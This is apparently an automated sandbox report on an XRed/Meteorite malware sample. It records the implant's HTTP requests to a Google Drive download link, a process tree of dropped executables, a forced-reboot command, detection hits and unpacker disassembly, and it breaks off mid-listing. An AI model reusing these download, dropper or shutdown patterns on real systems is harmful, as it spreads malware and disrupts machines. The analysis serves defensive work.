                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-HvYQeGOGn0qGuvE8uK2aGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Server: ESF
                                                                            Content-Length: 0
                                                                            X-XSS-Protection: 0
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            X-Content-Type-Options: nosniff
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.449870142.250.185.2254435236C:\ProgramData\Synaptics\Synaptics.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-02 19:36:01 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                            User-Agent: Synaptics.exe
                                                                            Cache-Control: no-cache
                                                                            Host: drive.usercontent.google.com
                                                                            Connection: Keep-Alive
                                                                            Cookie: NID=520=kc7xeLmHTbeshB1Kt41DRtFAHA16V2PEFTYZdyQO9kOuTtHSyFi4VkjSX8fRh9cZHHzD1aZrzARFPp9wwum22RqvtaeL2i6LDE0ezo9HINww6nkdgcLq35QtHVg4imOIO4H9qxwpv7D99I4LuZZgVtSd4dPvyYC3_xONL11tUVsyB5G1P1sbfC0
                                                                            2025-01-02 19:36:02 UTC1243INHTTP/1.1 404 Not Found
                                                                            X-GUploader-UploadID: AFiumC7DlfLHuS1GkP7G6C_WpFNx9iHLad_JAiFWI13_tl3cbeGV2YQrPZ_0YjiOgzDi7UWU
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Thu, 02 Jan 2025 19:36:02 GMT
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-TO2LLdMzwWzFICe98aqa2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Content-Length: 1652
                                                                            Server: UploadServer
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                            Connection: close
                                                                            2025-01-02 19:36:02 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                            2025-01-02 19:36:02 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 64 4f 43 6f 76 37 6d 72 7a 5f 6c 74 35 6d 33 54 69 68 35 58 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                            Data Ascii: t Found)!!1</title><style nonce="KdOCov7mrz_lt5m3Tih5Xw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                            2025-01-02 19:36:02 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            4192.168.2.449876142.250.186.1424435236C:\ProgramData\Synaptics\Synaptics.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-02 19:36:02 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                            User-Agent: Synaptics.exe
                                                                            Host: docs.google.com
                                                                            Cache-Control: no-cache
                                                                            Cookie: NID=520=kc7xeLmHTbeshB1Kt41DRtFAHA16V2PEFTYZdyQO9kOuTtHSyFi4VkjSX8fRh9cZHHzD1aZrzARFPp9wwum22RqvtaeL2i6LDE0ezo9HINww6nkdgcLq35QtHVg4imOIO4H9qxwpv7D99I4LuZZgVtSd4dPvyYC3_xONL11tUVsyB5G1P1sbfC0
                                                                            2025-01-02 19:36:03 UTC1314INHTTP/1.1 303 See Other
                                                                            Content-Type: application/binary
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Thu, 02 Jan 2025 19:36:03 GMT
                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce--oF6W2arTzxafsbKKm9LPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Server: ESF
                                                                            Content-Length: 0
                                                                            X-XSS-Protection: 0
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            X-Content-Type-Options: nosniff
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            5192.168.2.449887142.250.185.2254435236C:\ProgramData\Synaptics\Synaptics.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-02 19:36:04 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                            User-Agent: Synaptics.exe
                                                                            Cache-Control: no-cache
                                                                            Host: drive.usercontent.google.com
                                                                            Connection: Keep-Alive
                                                                            Cookie: NID=520=kc7xeLmHTbeshB1Kt41DRtFAHA16V2PEFTYZdyQO9kOuTtHSyFi4VkjSX8fRh9cZHHzD1aZrzARFPp9wwum22RqvtaeL2i6LDE0ezo9HINww6nkdgcLq35QtHVg4imOIO4H9qxwpv7D99I4LuZZgVtSd4dPvyYC3_xONL11tUVsyB5G1P1sbfC0
                                                                            2025-01-02 19:36:04 UTC1250INHTTP/1.1 404 Not Found
                                                                            X-GUploader-UploadID: AFiumC6zL-cB_Tsb3TfcKEY9YtjphCpf3gn_SFraLuN5OgxPYc52lAUIxKtOr7vEoGKyQHPyM1UPmpk
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Thu, 02 Jan 2025 19:36:04 GMT
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-_U9mHaZ6kW3xTkTXsaeOZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Content-Length: 1652
                                                                            Server: UploadServer
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                            Connection: close
                                                                            2025-01-02 19:36:04 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                            2025-01-02 19:36:04 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 65 4c 53 2d 4c 76 70 41 66 36 38 67 61 49 6b 4f 38 77 77 31 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="ueLS-LvpAf68gaIkO8ww1w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                            2025-01-02 19:36:04 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:14:34:46
                                                                            Start date:02/01/2025
                                                                            Path:C:\Users\user\Desktop\file.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                                                            Imagebase:0x400000
                                                                            File size:6'656 bytes
                                                                            MD5 hash:06303600A3A44EB2FBCE248EB0FE9FC1
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1747294140.0000000000780000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:1
                                                                            Start time:14:34:49
                                                                            Start date:02/01/2025
                                                                            Path:C:\Program Files (x86)\1.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\1.exe" 0
                                                                            Imagebase:0x400000
                                                                            File size:830'976 bytes
                                                                            MD5 hash:D026CFE00B08DA14B0A8B7F8860887D7
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:Borland Delphi
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000001.00000000.1709599751.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000001.00000000.1709599751.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Program Files (x86)\1.exe, Author: Joe Security
                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Program Files (x86)\1.exe, Author: Joe Security
                                                                            Antivirus matches:
                                                                            • Detection: 100%, Avira
                                                                            • Detection: 100%, Avira
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            • Detection: 100%, ReversingLabs
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:2
                                                                            Start time:14:34:49
                                                                            Start date:02/01/2025
                                                                            Path:C:\Users\user\Desktop\._cache_1.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\._cache_1.exe" 0
                                                                            Imagebase:0x400000
                                                                            File size:59'392 bytes
                                                                            MD5 hash:AED710082D6986C6DCEED09D3A5EDCC6
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 21%, ReversingLabs
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:3
                                                                            Start time:14:34:50
                                                                            Start date:02/01/2025
                                                                            Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                            Imagebase:0x400000
                                                                            File size:771'584 bytes
                                                                            MD5 hash:00367A9FAA8069389A97267D772563E8
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:Borland Delphi
                                                                            Yara matches:
                                                                            • Rule: MALWARE_Win_Meteorite, Description: Detects Meteorite downloader, Source: 00000003.00000003.1718137982.00000000020C4000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                            Antivirus matches:
                                                                            • Detection: 100%, Avira
                                                                            • Detection: 100%, Avira
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            • Detection: 100%, ReversingLabs
                                                                            Reputation:low
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:4
                                                                            Start time:14:34:50
                                                                            Start date:02/01/2025
                                                                            Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                            Imagebase:0x200000
                                                                            File size:53'161'064 bytes
                                                                            MD5 hash:4A871771235598812032C822E6F68F19
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:5
                                                                            Start time:14:34:53
                                                                            Start date:02/01/2025
                                                                            Path:C:\Program Files (x86)\2.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\2.exe" 0
                                                                            Imagebase:0x400000
                                                                            File size:4'645'376 bytes
                                                                            MD5 hash:85A57509DB3E9DFA7B4E451B8243220D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:Borland Delphi
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Program Files (x86)\2.exe, Author: Joe Security
                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Program Files (x86)\2.exe, Author: Joe Security
                                                                            Antivirus matches:
                                                                            • Detection: 100%, Avira
                                                                            • Detection: 100%, Avira
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            • Detection: 89%, ReversingLabs
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:7
                                                                            Start time:14:34:54
                                                                            Start date:02/01/2025
                                                                            Path:C:\Program Files (x86)\3.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\3.exe" 0
                                                                            Imagebase:0x400000
                                                                            File size:9'872 bytes
                                                                            MD5 hash:1EDB88F9EE745EAAEE2CBD8219318EB0
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 100%, Avira
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            • Detection: 87%, ReversingLabs
                                                                            Reputation:low
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:8
                                                                            Start time:14:34:54
                                                                            Start date:02/01/2025
                                                                            Path:C:\Users\user\Desktop\._cache_2.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\._cache_2.exe" 0
                                                                            Imagebase:0xdc0000
                                                                            File size:3'873'864 bytes
                                                                            MD5 hash:B7176450AEBB9572B34E875984456AC1
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 12%, ReversingLabs
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:9
                                                                            Start time:14:34:55
                                                                            Start date:02/01/2025
                                                                            Path:C:\Program Files (x86)\4.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\4.exe" 0
                                                                            Imagebase:0xd20000
                                                                            File size:346'414 bytes
                                                                            MD5 hash:39E7BE73C7531AC895F75834FDC1BCD6
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            • Detection: 68%, ReversingLabs
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:11
                                                                            Start time:14:34:58
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\wic.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\wic.exe" 0
                                                                            Imagebase:0xe80000
                                                                            File size:3'483'648 bytes
                                                                            MD5 hash:6AD65B03E75BC5509BA3104510178EE6
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 39%, ReversingLabs
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:12
                                                                            Start time:14:35:01
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\system32\cmd.exe /c "shutdown /r /t 0"
                                                                            Imagebase:0x240000
                                                                            File size:236'544 bytes
                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:13
                                                                            Start time:14:35:01
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff7699e0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:14
                                                                            Start time:14:35:01
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\SysWOW64\shutdown.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:shutdown /r /t 0
                                                                            Imagebase:0x7b0000
                                                                            File size:23'552 bytes
                                                                            MD5 hash:FCDE5AF99B82AE6137FB90C7571D40C3
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:18
                                                                            Start time:14:35:10
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\cbas.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\cbas.exe"
                                                                            Imagebase:0xba0000
                                                                            File size:295'424 bytes
                                                                            MD5 hash:9FD7C0ACC95C7F1311BDE279D0B6A03A
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 100%, Avira
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            • Detection: 47%, ReversingLabs
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:20
                                                                            Start time:14:36:53
                                                                            Start date:02/01/2025
                                                                            Path:C:\Windows\splwow64.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\splwow64.exe 12288
                                                                            Imagebase:0x7ff7ac4b0000
                                                                            File size:163'840 bytes
                                                                            MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:false

                                                                            Disassembly

                                                                            Reset < >

                                                                              Execution Graph

                                                                              Execution Coverage:11.4%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:88.9%
                                                                              Total number of Nodes:9
                                                                              Total number of Limit Nodes:1
                                                                              execution_graph 123 406a20 124 406a38 123->124 125 406b32 LoadLibraryA 124->125 126 406b77 VirtualProtect VirtualProtect 124->126 127 406b49 125->127 128 406bab 126->128 127->124 129 406b5b GetProcAddress 127->129 128->128 129->127 130 406b71 ExitProcess 129->130 131 40106c 6CF6AC91

                                                                              Callgraph

                                                                              Executed Functions

                                                                              Function 00406A20 Relevance: 7.7, APIs: 5, Instructions: 169COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 406a20-406a30 1 406a42-406a47 0->1 2 406a49 1->2 3 406a38-406a3d 2->3 4 406a4b 2->4 5 406a3e-406a40 3->5 6 406a50-406a52 4->6 5->1 5->2 7 406a54-406a59 6->7 8 406a5b-406a5f 6->8 7->8 8->6 9 406a61 8->9 10 406a63-406a6a 9->10 11 406a6c-406a71 9->11 10->6 10->11 12 406a80-406a82 11->12 13 406a73-406a7c 11->13 16 406a84-406a89 12->16 17 406a8b-406a8f 12->17 14 406af2-406af5 13->14 15 406a7e 13->15 18 406afa-406afd 14->18 15->12 16->17 19 406a91-406a96 17->19 20 406a98-406a9a 17->20 21 406aff-406b01 18->21 19->20 22 406abc-406acb 20->22 23 406a9c 20->23 21->18 26 406b03-406b06 21->26 24 406adc-406ae9 22->24 25 406acd-406ad4 22->25 27 406a9d-406a9f 23->27 24->24 29 406aeb-406aed 24->29 25->25 28 406ad6 25->28 26->18 30 406b08-406b24 26->30 31 406aa1-406aa6 27->31 32 406aa8-406aac 27->32 28->5 29->5 30->21 34 406b26 30->34 31->32 32->27 33 406aae 32->33 35 406ab0-406ab7 33->35 36 406ab9 33->36 37 406b2c-406b30 34->37 35->27 35->36 36->22 38 406b32-406b48 LoadLibraryA 37->38 39 406b77-406ba7 VirtualProtect * 2 37->39 40 406b49-406b4e 38->40 41 406bab-406baf 39->41 40->37 42 406b50-406b52 40->42 41->41 43 406bb1 41->43 44 406b54-406b5a 42->44 45 406b5b-406b68 GetProcAddress 42->45 44->45 46 406b71 ExitProcess 45->46 47 406b6a-406b6f 45->47 47->40
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1800946068.0000000000406000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1800868441.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1800902274.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1800902274.0000000000404000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1801134772.0000000000407000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5c670921fd43a50f4f938f6497018f61f5041d96101fcf9cdeb10b233845e411
                                                                              • Instruction ID: e6479a30e75d821938ea7dde79ac789c0e19f40ad4ec2d1cc88672ce5a0d7957
                                                                              • Opcode Fuzzy Hash: 5c670921fd43a50f4f938f6497018f61f5041d96101fcf9cdeb10b233845e411
                                                                              • Instruction Fuzzy Hash: 33511A717402524BD7206EB88C806A177A4EB43334B1A473ED5E7F73C5E7BC68268B68
                                                                              Function 0040106C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
